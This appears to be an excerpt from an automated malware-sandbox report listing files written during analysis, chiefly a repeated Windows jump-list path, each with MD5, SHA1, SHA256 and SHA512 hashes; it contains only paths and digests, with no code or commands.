SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bebb7f3030ef1b957a6ce5653daa5a4a
SHA1688472f5fb3b46abf26f6e8a2756b14926a75c3d
SHA2560650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4
SHA512b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
c4384a44c4f624cfb9b52fbf8116b786
SHA110b43504bef3b004ade71f99784b3bde4e324e8d
SHA256ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3
SHA51205fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32
-
MD5
8e8f7ff797c292231959e4dd410a98da
SHA15fba19ae9f76b445d96dbca71f53113492b09d49
SHA256ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b
SHA512c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27
-
MD5
8e8f7ff797c292231959e4dd410a98da
SHA15fba19ae9f76b445d96dbca71f53113492b09d49
SHA256ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b
SHA512c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27
-
MD5
8e8f7ff797c292231959e4dd410a98da
SHA15fba19ae9f76b445d96dbca71f53113492b09d49
SHA256ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b
SHA512c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27
-
MD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e